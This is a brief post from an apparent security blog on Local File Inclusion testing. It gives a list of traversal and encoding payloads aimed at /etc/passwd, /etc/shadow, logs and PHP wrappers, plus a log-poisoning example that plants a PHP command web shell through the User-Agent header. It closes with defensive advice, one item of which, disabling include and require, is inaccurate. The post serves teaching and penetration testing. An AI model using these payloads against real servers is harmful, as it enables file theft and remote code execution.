Vulnerabilities

Parameters to find LFI

Comments · 42 Views
User Image

Explore these parameters to find Local File Inclusion (LFI) vulnerabilities. Additionally, I've included some expert tips from my notes to enhance your testing:

Common LFI Payloads

These payloads are useful for testing LFI vulnerabilities in web applications:

  1. file=/etc/passwd%3F/
  2. file=/etc%252Fpasswd/
  3. file=/etc%252Fpasswd%3F/
  4. file=../../../../../../../../../etc/passwd
  5. file=../../../../../../../../../etc/passwd%00
  6. file=../../../../../../../../../etc/passwd%2500
  7. file=../../../../../../../../../etc/passwd%00.jpg
  8. file=../../../../../../../../../proc/self/environ
  9. file=../../../../../../../../../proc/self/fd/2
  10. file=../../../../../../../../../var/log/apache2/access.log
  11. file=php://filter/read=convert.base64-encode/resource=index.php


Tips for LFI Exploitation

  1. Null Byte Injection: Some applications may be vulnerable to null byte injection, which allows bypassing certain file extensions. For example, using %00 or %2500.

  2. Encoding Variants: Try different encoding techniques like double encoding (%252e%252e%252f for ../../).

  3. Traversal Beyond Root: Attempt traversing beyond the web root directory using multiple levels of ../.

  4. Log Poisoning: If you have access to a file upload functionality or any input that gets logged (e.g., user agent), you can try log poisoning to include your payload in log files.

  5. PHP Wrappers: Use PHP wrappers like php://filter, php://input, or php://expect to read or execute files.

  6. Common Files to Target:

    • /etc/passwd
    • /etc/shadow
    • /proc/self/environ
    • Web server logs (e.g., /var/log/apache2/access.log)
    • Configuration files (e.g., /etc/httpd/conf/httpd.conf)

  7. Web Application Files: Target files within the web application that might contain sensitive information, such as config.php, index.php, or .htaccess.

Example of a Log Poisoning Attack

If you can inject data into a log file, you can then include that log file via the LFI vulnerability to execute code. Here's a simple example:

  1. Inject PHP code into the user agent header:

User-Agent: <?php system($_GET['cmd']); ?>

Include the access log file to execute the code:

http://example.com/vulnerable.php?file=../../../../var/log/apache2/access.log&cmd=whoami

Defense Mechanisms

To prevent LFI vulnerabilities:

  1. Input Validation: Strictly validate and sanitize all user inputs.
  2. Use Whitelists: Use a whitelist of allowed file paths.
  3. Disable Dangerous Functions: Disable PHP functions like include, require, include_once, and require_once if not needed.
  4. Web Application Firewalls (WAFs): Employ a WAF to detect and block LFI attempts.
  5. Least Privilege: Ensure the web server runs with the least privileges necessary.

 

Read more
Article Picture

What is CTF?
24 May 2024
Article Picture

O Código Seguro contribui para a proteção do seu negócio?
18 May 2024
Article Picture

Os desafios da implementação DevSecOps
27 May 2024
Comments
shadowisnear 20 w

Good job mate!

 
 
Search
Popular Posts
Categories

© 2024 CYBERHACK